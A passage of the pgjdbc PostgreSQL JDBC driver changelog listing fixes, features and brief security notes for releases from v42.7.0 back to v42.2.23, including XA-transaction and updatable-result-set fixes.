[PR #&#8203;4063](https://github.com/pgjdbc/pgjdbc/pull/4063) - fix: `PGXAConnection` no longer saves and restores the underlying connection's JDBC `autoCommit` flag. All XA-protocol SQL (`BEGIN`, `PREPARE TRANSACTION`, `COMMIT`, `ROLLBACK`, `COMMIT PREPARED`, `ROLLBACK PREPARED`, the `recover()` SELECT) is sent through `QUERY_SUPPRESS_BEGIN`, so the caller's `autoCommit` value is invariant across every `XAResource` call. Fixes the "2nd phase commit must be issued using an idle connection" failure during recovery on managed datasources that pool connections with `autoCommit=false` (TomEE, WildFly, WebSphere Liberty). - fix: `PGXAConnection.prepare()` now mutates XA state only after `PREPARE TRANSACTION` succeeds. A failed `PREPARE` previously left the driver thinking the branch was already prepared, so the follow-up `rollback(xid)` tried `ROLLBACK PREPARED` against a non-existent gid and returned `XAER_RMERR`. Transaction managers (Narayana) escalated this to `HeuristicMixedException`. With the fix, `rollback(xid)` takes the active-branch path and issues a plain `ROLLBACK`, which the server accepts cleanly. Fixes [Issue #&#8203;3153](https://github.com/pgjdbc/pgjdbc/issues/3153), [Issue #&#8203;3123](https://github.com/pgjdbc/pgjdbc/issues/3123). - fix: an updatable result set over an unqualified table name is now classified using only the table visible through `search_path`. When two schemas held a table with the same name and the same primary or unique index name but a different set of key columns, the driver took the union of both schemas' columns, so the result set could be wrongly rejected as not updatable [PR #&#8203;4214](https://github.com/pgjdbc/pgjdbc/pull/4214). Supersedes [PR #&#8203;3400](https://github.com/pgjdbc/pgjdbc/pull/3400). ### [`v42.7.0`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4270-2023-11-20-093300--0500) ##### Changed - fix: Deprecate for removal PGPoint.setLocation(java.awt.Point) to cut dependency to `java.desktop` module. [PR #&#8203;2967](https://github.com/pgjdbc/pgjdbc/pull/2967) - feat: return all catalogs for getCatalogs metadata query closes [ISSUE #&#8203;2949](https://github.com/pgjdbc/pgjdbc/issues/2949) [PR #&#8203;2953](https://github.com/pgjdbc/pgjdbc/pull/2953) - feat: support SET statements combining with other queries with semicolon in PreparedStatement [PR ##&#8203;2973](https://github.com/pgjdbc/pgjdbc/pull/2973) ##### Fixed - chore: add styleCheck Gradle task to report style violations [PR #&#8203;2980](https://github.com/pgjdbc/pgjdbc/pull/2980) - fix: Include currentXid in "Error rolling back prepared transaction" exception message [PR #&#8203;2978](https://github.com/pgjdbc/pgjdbc/pull/2978) - fix: add varbit as a basic type inside the TypeInfoCache [PR #&#8203;2960](https://github.com/pgjdbc/pgjdbc/pull/2960) - fix: Fix failing tests for version 16. [PR #&#8203;2962](https://github.com/pgjdbc/pgjdbc/pull/2962) - fix: allow setting arrays with ANSI type name [PR #&#8203;2952](https://github.com/pgjdbc/pgjdbc/pull/2952) - feat: Use KeepAlive to confirm LSNs [PR #&#8203;2941](https://github.com/pgjdbc/pgjdbc/pull/2941) - fix: put double ' around log parameter [PR #&#8203;2936](https://github.com/pgjdbc/pgjdbc/pull/2936) fixes [ISSUE #&#8203;2935](https://github.com/pgjdbc/pgjdbc/issues/2935) - fix: Fix Issue [#&#8203;2928](https://github.com/pgjdbc/pgjdbc/issues/2928) number of ports not equal to number of servers in datasource [PR #&#8203;2929](https://github.com/pgjdbc/pgjdbc/pull/2929) - fix: Use canonical DateStyle name ([#&#8203;2925](https://github.com/pgjdbc/pgjdbc/issues/2925)) fixes [pgbouncer issue](https://github.com/pgbouncer/pgbouncer/issues/776) - fix: Method getFastLong should be able to parse all longs [PR #&#8203;2881](https://github.com/pgjdbc/pgjdbc/pull/2881) - docs: Fix typos in info.html [PR #&#8203;2860](https://github.com/pgjdbc/pgjdbc/pull/2860) - fix: Return correct default from PgDatabaseMetaData.getDefaultTransactionIsolation [PR #&#8203;2992](https://github.com/pgjdbc/pgjdbc/pull/2992) fixes [Issue #&#8203;2991](https://github.com/pgjdbc/pgjdbc/issues/2991) - test: fix assertion in RefCursorFetchTestultFetchSize rows - test: use try-with-resources in LogicalReplicationStatusTest ### [`v42.6.0`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4260-2023-03-17-153434--0400) ##### Changed - fix: use PhantomReferences instead of `Obejct.finalize()` to track Connection leaks [PR #&#8203;2847](https://github.com/pgjdbc/pgjdbc/pull/2847) The change replaces all uses of Object.finalize with PhantomReferences. The leaked resources (Connections) are tracked in a helper thread that is active as long as there are connections in use. By default, the thread keeps running for 30 seconds after all the connections are released. The timeout is set with pgjdbc.config.cleanup.thread.ttl system property. - refactor:(loom) replace the usages of synchronized with ReentrantLock [PR #&#8203;2635](https://github.com/pgjdbc/pgjdbc/pull/2635) Fixes [Issue #&#8203;1951](https://github.com/pgjdbc/pgjdbc/issues/1951) ### [`v42.5.4`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4254-2023-02-15-102104--0500) ##### Fixed - fix: fix testGetSQLTypeQueryCache by searching for xid type. We used to search for box type but it is now cached. xid is not cached, this nuance is required for the test. - fix OidValueCorrectnessTest BOX\_ARRAY OID, by adding BOX\_ARRAY to the oidTypeName map \[PR [#&#8203;2810](https://github.com/pgjdbc/pgjdbc/issues/2810)]\(([#&#8203;2810](https://github.com/pgjdbc/pgjdbc/pull/2810)). - fixes [Issue #&#8203;2804](https://github.com/pgjdbc/pgjdbc/issues/2804). - fix: Make sure that github CI runs tests on all [PRs #&#8203;2809](\(https://github.com/pgjdbc/pgjdbc/pull/2809\)). ### [`v42.5.3`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4253-2023-02-03-082450--0500) ##### Fixed - fix: Add box to TypeInfoCache, fixes [Issue #&#8203;2746](https://github.com/pgjdbc/pgjdbc/issues/2746) [PR #&#8203;2747](https://github.com/pgjdbc/pgjdbc/pull/2747) - fix: regression in PgResultSet LONG\_MIN copy and paste error fixes [Issue #&#8203;2748](https://github.com/pgjdbc/pgjdbc/issues/2748) [PR#2749](https://github.com/pgjdbc/pgjdbc/pull/2749) ### [`v42.5.2`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4252-2023-01-31-143046--0500) ##### Changed - regression: This release has 2 known regressions which make it unusable see the notes above. We advise people to use 42.5.3 instead. - docs: specify that timeouts are in seconds and there is a maximum. Housekeeping on some tests fixes [#Issue 2671](https://github.com/pgjdbc/pgjdbc/issues/2671) [PR #&#8203;2686](https://github.com/pgjdbc/pgjdbc/pull/2686) - docs: clarify binaryTransfer and add it to README [PR# 2698](https://github.com/pgjdbc/pgjdbc/pull/2698) - docs: Document the need to encode reserved characters in the connection URL [PR #&#8203;2700](https://github.com/pgjdbc/pgjdbc/pull/2700) - feat: Define binary transfer for custom types dynamically/automatically fixes [Issue #&#8203;2554](https://github.com/pgjdbc/pgjdbc/issues/2554) [PR #&#8203;2556](https://github.com/pgjdbc/pgjdbc/pull/2556) ##### Added - fix: added gssResponseTimeout as part of [PR #&#8203;2687](https://github.com/pgjdbc/pgjdbc/pull/2687) to make sure we don't wait forever on a GSS RESPONSE ##### Fixed - fix: Ensure case of XML tags in Maven snippet is correct [PR #&#8203;2682](https://github.com/pgjdbc/pgjdbc/pull/2682) - fix: Make sure socket is closed if an exception is thrown in createSocket fixes [Issue #&#8203;2684](https://github.com/pgjdbc/pgjdbc/issues/2684) [PR #&#8203;2685](https://github.com/pgjdbc/pgjdbc/pull/2685) - fix: Apply patch from [Issue #&#8203;2683](https://github.com/pgjdbc/pgjdbc/issues/2683) to fix hanging ssl connections [PR #&#8203;2687](https://github.com/pgjdbc/pgjdbc/pull/2687) - fix - binary conversion of (very) long numeric values (longer than 4 \* 2^15 digits) [PR #&#8203;2697](https://github.com/pgjdbc/pgjdbc/pull/2697) fixes [Issue #&#8203;2695](https://github.com/pgjdbc/pgjdbc/issues/2695) - minor: enhance readability connection of startup params [PR #&#8203;2705](https://github.com/pgjdbc/pgjdbc/pull/2785) ### [`v42.5.1`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4251-2022-11-23-101459--0500) ##### Security - security: StreamWrapper spills to disk if setText, or setBytea sends very large Strings or arrays to the server. createTempFile creates a file which can be read by other users on unix like systems (Not macos). This has been fixed in this version fixes CVE-2022-41946 see the [security advisory](https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-562r-vg33-8x8h) for more details. Reported by [Jonathan Leitschuh](https://github.com/JLLeitschuh) This has been fixed in versions 42.5.1, 42.4.3 42.3.8, 42.2.27.jre7. Note there is no fix for 42.2.26.jre6. See the security advisory for work arounds. ##### Fixed - fix: make sure we select array\_in from pg\_catalog to avoid duplicate array\_in functions fixes [#Issue 2548](https://github.com/pgjdbc/pgjdbc/issues/2548) [PR #&#8203;2552](https://github.com/pgjdbc/pgjdbc/issues/2552) - fix: binary decoding of bool values [PR #&#8203;2640](https://github.com/pgjdbc/pgjdbc/pull/2640) - perf: improve performance of PgResultSet getByte/getShort/getInt/getLong for float-typed columns [PR #&#8203;2634](https://github.com/pgjdbc/pgjdbc/pull/2634) - chore: fix various spelling errors [PR #&#8203;2592](https://github.com/pgjdbc/pgjdbc/pull/2592) - chore: Feature/urlparser improve URLParser [PR #&#8203;2641](https://github.com/pgjdbc/pgjdbc/pull/2592) ### [`v42.5.0`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4250-2022-08-23-112011--0400) ##### Changed - fix: revert change in [PR #&#8203;1986](https://github.com/pgjdbc/pgjdbc/pull/1986) where float was aliased to float4 from float8. float now aliases to float8 [PR #&#8203;2598](https://github.com/pgjdbc/pgjdbc/pull/2598) fixes [Issue #&#8203;2597](https://github.com/pgjdbc/pgjdbc/issues/2597) ### [`v42.4.2`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4242-2022-08-17-103340--0400) ##### Changed - fix: add alias to the generated getUDT() query for clarity (PR [#&#8203;2553](https://github.com/pgjdbc/pgjdbc/issues/2553))\[[#&#8203;2553](https://github.com/pgjdbc/pgjdbc/pull/2553)] ##### Added - fix: make setObject accept UUID array [PR #&#8203;2587](https://github.com/pgjdbc/pgjdbc/pull/2587) ##### Fixed - fix: regression with GSS. Changes introduced to support building with Java 17 caused failures [Issue #&#8203;2588](https://github.com/pgjdbc/pgjdbc/issues/2588) - fix: set a timeout to get the return from requesting SSL upgrade. [PR #&#8203;2572](https://github.com/pgjdbc/pgjdbc/pull/2572) - feat: synchronize statement executions (e.g. avoid deadlock when Connection.isValid is executed from concurrent threads) ### [`v42.4.1`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4241-2022-08-01-162420--0400) ##### Security - fix: CVE-2022-31197 Fixes SQL generated in PgResultSet.refresh() to escape column identifiers so as to prevent SQL injection. - Previously, the column names for both key and data columns in the table were copied as-is into the generated SQL. This allowed a malicious table with column names that include statement terminator to be parsed and executed as multiple separate commands. - Also adds a new test class ResultSetRefreshTest to verify this change. - Reported by [Sho Kato](https://github.com/kato-sho) ##### Changed - chore: skip publishing pgjdbc-osgi-test to Central - chore: bump Gradle to 7.5 - test: update JUnit to 5.8.2 ##### Added - chore: added Gradle Wrapper Validation for verifying gradle-wrapper.jar - chore: added "permissions: contents: read" for GitHub Actions to avoid unintentional modifications by the CI - chore: support building pgjdbc with Java 17 - feat: synchronize statement executions (e.g. avoid deadlock when Connection.isValid is executed from concurrent threads) ### [`v42.4.0`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4240-2022-06-09-081402--0400) ##### Changed - fix: added GROUP\_STARTUP\_PARAMETERS boolean property to determine whether or not to group startup parameters in a transaction (default=false like 42.2.x) fixes [Issue #&#8203;2425](https://github.com/pgjdbc/pgjdbc/issues/2497) pgbouncer cannot deal with transactions in statement pooling mode [PR #&#8203;2425](https://github.com/pgjdbc/pgjdbc/pull/2425) ##### Fixed - fix: queries with up to 65535 (inclusive) parameters are supported now (previous limit was 32767) [PR #&#8203;2525](https://github.com/pgjdbc/pgjdbc/pull/2525), [Issue #&#8203;1311](https://github.com/pgjdbc/pgjdbc/issues/1311) - fix: workaround JarIndex parsing issue by using groupId/artifactId-version directory namings. Regression since 42.2.13. [PR #&#8203;2531](https://github.com/pgjdbc/pgjdbc/pull/2531), [issue #&#8203;2527](https://github.com/pgjdbc/pgjdbc/issues/2527) - fix: use Locale.ROOT for toUpperCase() toLowerCase() calls - doc: add Vladimir Sitnikov's PGP key - fix: return correct base type for domain from getUDTs [PR #&#8203;2520](https://github.com/pgjdbc/pgjdbc/pull/2520) [Issue #&#8203;2522](https://github.com/pgjdbc/pgjdbc/issues/2522) - perf: utcTz static and renamed to UTC\_TIMEZONE [PR #&#8203;2519](https://github.com/pgjdbc/pgjdbc/pull/2520) - doc: fix release version for [#&#8203;2377](https://github.com/pgjdbc/pgjdbc/issues/2377) (it should be 42.3.6, not 42.3.5) ### [`v42.3.6`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4236-2022-05-24-085227--0400) ##### Changed ##### Added ##### Fixed - fix: close refcursors when underlying cursor==null instead of relying on defaultRowFetchSize [PR #&#8203;2377](https://github.com/pgjdbc/pgjdbc/pull/2377) ### [`v42.3.5`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4235-2022-05-04-084835--0400) ##### Changed - test: polish TimestampUtilsTest - chore: use GitHub Action concurrency feature to terminate CI jobs on fast PR pushes ##### Added - Added KEYS file to allow for verifying artifacts [PR 2499](https://github.com/pgjdbc/pgjdbc/pull/2499) ##### Fixed - perf: enable tcpNoDelay by default [PR 2495](https://github.com/pgjdbc/pgjdbc/pull/2495). This is a regression from 42.2.x versions where tcpNoDelay defaulted to true - docs: fix readme.md after [PR 2495](https://github.com/pgjdbc/pgjdbc/pull/2495) [PR 2496](https://github.com/pgjdbc/pgjdbc/pull/249) - feat: targetServerType=preferPrimary connection parameter [PR 2483](https://github.com/pgjdbc/pgjdbc/pull/2483) - fix: revert removal of toOffsetDateTime(String timestamp) fixes [Issue #&#8203;2497](https://github.com/pgjdbc/pgjdbc/issues/2497) [PR 2501](https://github.com/pgjdbc/pgjdbc/pull/2501) ### [`v42.3.4`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4234-2022-04-01-141628--0400) ##### Changed - fix: change name of build cache [PR 2471](https://github.com/pgjdbc/pgjdbc/pull/2471) - feat: add support for ResultSet#getObject(OffsetTime.class) and PreparedStatement#setObject(OffsetTime.class) [PR 2467](https://github.com/pgjdbc/pgjdbc/pull/2467) - fix: Use non-synchronized getTimeZone in TimestampUtils [PR 2451](https://github.com/pgjdbc/pgjdbc/pull/2451) - docs: Fix CHANGELOG.md misformatted markdown headings [PR 2461](https://github.com/pgjdbc/pgjdbc/pull/2461) - docs: remove loggerLevel and loggerFile from docs and issues [PR 2489](https://github.com/pgjdbc/pgjdbc/pull/2489) - feat: use direct wire format -> LocalDate conversion without resorting to java.util.Date, java.util.Calendar, and default timezones [PR 2464](https://github.com/pgjdbc/pgjdbc/pull/2464) fixes Issue [#&#8203;2221](https://github.com/pgjdbc/pgjdbc/issues/2221) ##### Added ##### Fixed - docs: Update testing documentation [PR 2446](https://github.com/pgjdbc/pgjdbc/pull/2446) - fix: Throw an exception if the driver cannot parse the URL instead of returning NULL fixes [Issue #&#8203;2421](https://github.com/pgjdbc/pgjdbc/issues/2421) [PR 2441](https://github.com/pgjdbc/pgjdbc/pull/2441) - fix: Use PGProperty instead of the property names directly [PR 2444](https://github.com/pgjdbc/pgjdbc/pull/2444) - docs: update changelog, missing links at bottom and formatting [PR 2460](https://github.com/pgjdbc/pgjdbc/pull/2460) - fix: Remove isDeprecated from PGProperty. It was originally intended to help produce automated docs. Fixes Issue [#&#8203;2479](https://github.com/pgjdbc/pgjdbc/issues/2479) [PR 2480](https://github.com/pgjdbc/pgjdbc/pull/2480) - fix: change PGInterval parseISO8601Format to support fractional second [PR 2457](https://github.com/pgjdbc/pgjdbc/pull/2457) - fix: GSS login to use TGT from keytab fixes Issue [#&#8203;2469](https://github.com/pgjdbc/pgjdbc/issues/2469) [PR 2470](https://github.com/pgjdbc/pgjdbc/pull/2470) - fix: More test and fix for issues discovered by [PR #&#8203;2476](https://github.com/pgjdbc/pgjdbc/pull/2476) [PR #&#8203;2488](https://github.com/pgjdbc/pgjdbc/pull/2488) ### [`v42.3.3`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4233-2022-02-15-113224--0500) ##### Changed - fix: Removed loggerFile and loggerLevel configuration. While the properties still exist. They can no longer be used to configure the driver logging. Instead use java.util.logging configuration mechanisms such as `logging.properties`. ##### Added ##### Fixed ### [`v42.3.2`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4232-2022-02-01-073541--0500) ##### Security - CVE-2022-21724 pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, sslpasswordcallback connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. This would allow a malicious class to be instantiated that could execute arbitrary code from the JVM. Fixed in [commit](https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813) ##### Changed - perf: read in\_hot\_standby GUC on connection [PR #&#8203;2334](https://github.com/pgjdbc/pgjdbc/pull/2334) - test: materialized view privileges [PR #&#8203;2209](https://github.com/pgjdbc/pgjdbc/pull/2209) fixes [Issue #&#8203;2060](https://github.com/pgjdbc/pgjdbc/issues/2060) - docs: add info about convenience maven project [PR #&#8203;2407](https://github.com/pgjdbc/pgjdbc/pull/2407) - docs: Document timezone reversal from POSIX to ISO [PR #&#8203;2413](https://github.com/pgjdbc/pgjdbc/pull/2413) - fix: we will ask the server if it supports GSS Encryption if gssEncryption is prefer or require [PR #&#8203;2396](https://github.com/pgjdbc/pgjdbc/pull/2396) remove the need to have a ticket in the cache before asking the server if gss encryptions are supported - docs: remove Java 6 and 7 references from contributing [PR #&#8203;2385](https://github.com/pgjdbc/pgjdbc/pull/2385) - style: remove Java 8 / JDBC 4.2 checks [PR #&#8203;2383](https://github.com/pgjdbc/pgjdbc/pull/2383) Remove all remaining checks whether the source is lower than Java 8 or JDBC 4.2. - fix: throw SQLException for #getBoolean BIT(>1) [PR #&#8203;2386](https://github.com/pgjdbc/pgjdbc/pull/2386) Throw SQLException instead of ClassCastException when calling CallableStatement#getBoolean(int) on BIT(>1). - style: import java.time types in more classes [PR #&#8203;2382](https://github.com/pgjdbc/pgjdbc/pull/2382) Use imports for java.time types in all remaining classes. - style: import java.time types in TimestampUtils [PR #&#8203;2380](https://github.com/pgjdbc/pgjdbc/pull/2380) Use imports for java.time types in TimestampUtils. - refactor: Change internal constructors to pass only connection Properties Changes internal constructors for PgConnection and related classes to only accept the connection properties object and remove the user and password arguments. Any locations that required those fields can retrieve them from the properties map. - test: Fix DatabaseMetadataTest to perform mview tests only on 9.3+ - perf: read in\_hot\_standby GUC on connection [PR #&#8203;2334](https://github.com/pgjdbc/pgjdbc/pull/2334) - doc: improv doc around binary decoding of numeric data [#&#8203;2331](https://github.com/pgjdbc/pgjdbc/pull/2331) - Add cert key type checking to chooseClientAlias [PR #&#8203;2417](https://github.com/pgjdbc/pgjdbc/pull/2417) ##### Added - feat: Add authenticationPluginClassName option to provide passwords at runtime Adds authenticationPluginClassName connection property that allows end users to specify a class that will provide the connection passwords at runtime. Users implementing that interface must ensure that each invocation of the method provides a new char\[] array as the contents will be filled with zeroes by the driver after use.Call sites within the driver have been updated to use the char\[] directly wherever possible. This includes direct usage in the GSS authentication code paths that internally were already converting the String password into a char\[] for internal usage. This allows configuring a connection with a password that must be generated on the fly or periodically changes. [PR #&#8203;2369](https://github.com/pgjdbc/pgjdbc/pull/2369) original issue [Issue #&#8203;2102](https://github.com/pgjdbc/pgjdbc/issues/2102) - feat: add tcpNoDelay option [PR #&#8203;2341](https://github.com/pgjdbc/pgjdbc/pull/2341) fixes [Issue #&#8203;2324](https://github.com/pgjdbc/pgjdbc/issues/2324) - feat: pg\_service.conf and .pgpass support (jdbc:postgresql://?service=my-service) [PR #&#8203;2260](https://github.com/pgjdbc/pgjdbc/pull/2260) fixes [Issue #&#8203;2278](https://github.com/pgjdbc/pgjdbc/issues/2278) ##### Fixed - Use local TimestampUtil in PgStatement and PgResultset for thread safety [PR #&#8203;2291](https://github.com/pgjdbc/pgjdbc/pull/2291) fixes [Issue #&#8203;921](https://github.com/pgjdbc/pgjdbc/issues/921) synchronize modification of shared calendar - fix: PgObject isNull() was reporting the opposite fixes [Issue #&#8203;2411](https://github.com/pgjdbc/pgjdbc/issues/2411) [PR #&#8203;2414](https://github.com/pgjdbc/pgjdbc/pull/2414) - fix: default file name is ".pg\_service.conf" on Windows (not "pg\_service.conf") [PR #&#8203;2398](https://github.com/pgjdbc/pgjdbc/pull/2398) fixes [Issue #&#8203;2278](https://github.com/pgjdbc/pgjdbc/issues/2278) - test: Fix RefCursorFetchTest on older platforms - fix: do not close refcursor after reading if fetchsize has been set fixes [Issue #&#8203;2227](https://github.com/pgjdbc/pgjdbc/issues/2227) [PR #&#8203;2371](https://github.com/pgjdbc/pgjdbc/pull/2371) - fix: rework gss authentication to use the principal name to get the credentials fixes [Issue #&#8203;2235](https://github.com/pgjdbc/pgjdbc/issues/2235) [PR #&#8203;2352](https://github.com/pgjdbc/pgjdbc/pull/2352) - fix: return getIndexInfo metadata columns in UPPER CASE [PR #&#8203;2368](https://github.com/pgjdbc/pgjdbc/pull/2368) - fix: Connection leak in ConnectionFactoryImpl#tryConnect [PR #&#8203;2350](https://github.com/pgjdbc/pgjdbc/pull/2350) [Issue #&#8203;2351](https://github.com/pgjdbc/pgjdbc/issues/2351) - fix: Fix For IS\_AUTOGENERATED Flag [PR #&#8203;2348](https://github.com/pgjdbc/pgjdbc/pull/2348) - fix: parsing service file tests for windows [PR #&#8203;2347](https://github.com/pgjdbc/pgjdbc/pull/2347) - fix: The spec says that calling close() on a closed connection is a noop. [PR #&#8203;2345](https://github.com/pgjdbc/pgjdbc/pull/2345) fixes [Issue #&#8203;2300](https://github.com/pgjdbc/pgjdbc/issues/2300) - fix: add microsecond precision to getTimestamp() called on sql TIME(6) Currently, "when fetching a value of type TIME(6) through resultSet.getTimestamp() only ms precision is retained, the microsecond fractional digits are lost." This change will retain the microsecond precision when .getTimestamp() is called on TIME(6). [PR #&#8203;2181](https://github.com/pgjdbc/pgjdbc/pull/2181) Closes [Issue #&#8203;1537](https://github.com/pgjdbc/pgjdbc/issues/1537) - test: materialized view privileges [PR #&#8203;2209](https://github.com/pgjdbc/pgjdbc/pull/2209) add and drop a materialized view Add to TestUtil and also to DatabaseMetaData setup and teardown fixes [Issue #&#8203;2060](https://github.com/pgjdbc/pgjdbc/issues/2060) - fix: typo in connect.md [PR #&#8203;2338](https://github.com/pgjdbc/pgjdbc/pull/2238) `OutOfMemoryException` => `OutOfMemoryError` - fix: use local TimestampUtil in PgStatement and PgResultset for thread safety TimestampUtil is not thread safe. It raises exceptions when multiple threads use ResultSets of one connection. [PR #&#8203;2291](https://github.com/pgjdbc/pgjdbc/pull/2291) fixes [Issue #&#8203;921](https://github.com/pgjdbc/pgjdbc/issues/921) If PgStatement and PgResultSet use their own TimestampUtil no synchronize is needed. - fix: typo in CONTRIBUTING.md [PR #&#8203;2332](https://github.com/pgjdbc/pgjdbc/pull/2332) seccion => section ### [`v42.3.1`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4231-2021-10-29) ##### Changed - improv: Arrays in Object\[] [PR 2330](https://github.com/pgjdbc/pgjdbc/pull/2330) when an Object\[] contains other arrays, treat as though it were a multi-dimensional array the one exception is byte\[], which is not supported. - improv: Use jre utf-8 decoding [PR 2317](https://github.com/pgjdbc/pgjdbc/pull/2317) Remove use of custom utf-8 decoding. - perf: improve performance of bytea string decoding [PR 2320](https://github.com/pgjdbc/pgjdbc/pull/2320) improve the parsing of bytea hex encoded string by making a lookup table for each of the valid ascii code points to the 4 bit numeric value - feat: intern/canonicalize common strings [PR 2234](https://github.com/pgjdbc/pgjdbc/pull/2234) ##### Added ##### Fixed - numeric binary decode for even 10 thousands [PR #&#8203;2327](https://github.com/pgjdbc/pgjdbc/pull/2327) fixes [Issue 2326](https://github.com/pgjdbc/pgjdbc/issues/2326) binary numeric values which represented integers multiples of 10,000 from 10,000-9,990,000 were not decoded correctly - \[typo] typo in certdir/README.md [PR #&#8203;2309](https://github.com/pgjdbc/pgjdbc/pull/2309) certificatess => certificates - \[typo] typo in TimestampUtils.java [PR #&#8203;2314](https://github.com/pgjdbc/pgjdbc/pull/2314) Change `Greagorian` to `Gregorian`. - remove check for negative pid in cancel request. Apparently pgbouncer can send one fixes [Issue 2317](https://github.com/pgjdbc/pgjdbc/issues/2317) [PR #&#8203;2319](https://github.com/pgjdbc/pgjdbc/pull/2319) ### [`v42.3.0`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4230-2021-10-18) ##### Changed - No longer build for Java 6 or Java 7 - If assumeMinServerVersion is not defined and server is at least 9.0, group startup statements into a single transaction PR [#&#8203;1977](https://github.com/pgjdbc/pgjdbc/pull/1977) ##### Added - Support for pg\_service.conf file and jdbc URL syntax: "jdbc:postgresql://?service=service1". Resource can be provided using 1) property "-Dorg.postgresql.pgservicefile=file1" 2) environment variable PGSERVICEFILE=file2 3) default location "$HOME/.pg\_service.conf" 4) environment variable PGSYSCONFDIR=dir1 looks for file "dir1/pg\_service.conf". - Support for .pgpass file. Resource can be provided using 1) property "-Dorg.postgresql.pgpassfile=file1" 2) environment variable PGPASSFILE=file2 3) default location "$HOME/.pgpass" ##### Fixed - Rework OSGi bundle activator so it does not rely on exception message to check DataSourceFactory presence PR [#&#8203;507](https://github.com/pgjdbc/pgjdbc/pull/507) - Fix database metadata getFunctions() and getProcedures() to ignore search\_path when no schema pattern is specified [PR #&#8203;2174](https://github.com/pgjdbc/pgjdbc/pull/2174) - Fix refreshRow made the row readOnly. \[PR [#&#8203;2195](https://github.com/pgjdbc/pgjdbc/issues/2195)]\([#&#8203;2195](https://github.com/pgjdbc/pgjdbc/pull/2195) Fixes [Issue #&#8203;2193](https://github.com/pgjdbc/pgjdbc/issues/2193) - Fix do not add double quotes to identifiers already double quoted [PR #&#8203;2224](https://github.com/pgjdbc/pgjdbc/pull/2224) Fixes [Issue #&#8203;2223](https://github.com/pgjdbc/pgjdbc/issues/2223) Add a property `QUOTE_RETURNING_IDENTIFIERS` which determines if we put double quotes around identifiers that are provided in the returning array. - Fix Provide useful error message for empty or missing passwords for SCRAM auth [PR #&#8203;2290](https://github.com/pgjdbc/pgjdbc/pull/2290) fixes [Issue #&#8203;2288](https://github.com/pgjdbc/pgjdbc/issues/2288) ### [`v42.2.24`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#42224-2021-09-23) ##### Fixed - Fix startup regressions caused by [PR #&#8203;1949](https://github.com/pgjdbc/pgjdbc/pull/1949). Instead of checking all types by OID, we can return types for well known types [PR #&#8203;2257](https://github.com/pgjdbc/pgjdbc/pull/2257) - Backport [PR #&#8203;2148](https://github.com/pgjdbc/pgjdbc/pull/2148) Avoid leaking server error details through BatchUpdateException when logServerErrorDetail [PR #&#8203;2254](https://github.com/pgjdbc/pgjdbc/pull/2254) - Backpatch [PR #&#8203;2247](https://github.com/pgjdbc/pgjdbc/pull/2247) QueryExecutorImpl.receiveFastpathResult did not properly handle ParameterStatus messages. This in turn caused failures for some LargeObjectManager operations. Closes [Issue #&#8203;2237](https://github.com/pgjdbc/pgjdbc/issues/2237) Fixed by adding the missing code path, based on the existing handling in processResults. [PR #&#8203;2253](https://github.com/pgjdbc/pgjdbc/pull/2253) - Backpatch [PR #&#8203;2242](https://github.com/pgjdbc/pgjdbc/pull/2242) PgDatabaseMetaData.getIndexInfo() cast operands to smallint [PR#2253](https://github.com/pgjdbc/pgjdbc/pull/2253) It is possible to break method PgDatabaseMetaData.getIndexInfo() by adding certain custom operators. This PR fixes it. - Backpatching [PR #&#8203;2251](https://github.com/pgjdbc/pgjdbc/pull/2251) into 42.2 Clean up open connections to fix test failures on omni and appveyor use older syntax for COMMENT ON FUNCTION with explicit no-arg parameter parentheses as it is required on server versions before v10. Handle cleanup of connection creation in StatementTest, handle cleanup of privileged connection in DatabaseMetaDataTest - Backpatch [PR #&#8203;2245](https://github.com/pgjdbc/pgjdbc/pull/2245) fixes case where duplicate tables are returned if there are duplicate descriptions oids are not guaranteed to be unique in the catalog [PR #&#8203;2248](https://github.com/pgjdbc/pgjdbc/pull/2248) - Change to updatable result set to use correctly primary or unique keys [PR #&#8203;2228](https://github.com/pgjdbc/pgjdbc/pull/2228) fixes issues introduced in [PR #&#8203;2199](https://github.com/pgjdbc/pgjdbc/pull/2199) closes [Issue #&#8203;2196](https://github.com/pgjdbc/pgjdbc/issues/2196) - Fix NPE calling getTypeInfo when alias is null [PR #&#8203;2220](https://github.com/pgjdbc/pgjdbc/pull/2220) - Backpatch [PR #&#8203;2217](https://github.com/pgjdbc/pgjdbc/pull/2217) to fix [Issue #&#8203;2215](https://github.com/pgjdbc/pgjdbc/issues/2215). OIDs are unsigned integers and were not being handled correctly when they exceeded the size of signed integers ### [`v42.2.23`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#42223-2021-07-06) ##### Changed - Renewed the SSL keys for testing ##### Fixed - getColumnPrecision for Numeric when scale and precision not specified now returns 0 instead of 131089 fixes: Issue [#&#8203;2188](https://github.com/pgjdbc/pgjdbc/issues/2188) - Calling refreshRow on an updateable resultset made the row readOnly. Fixes Issue [#&#8203;2193](https://github.com/pgjdbc/pgjdbc/issues/2193) - results should be updateable if there is a unique index available 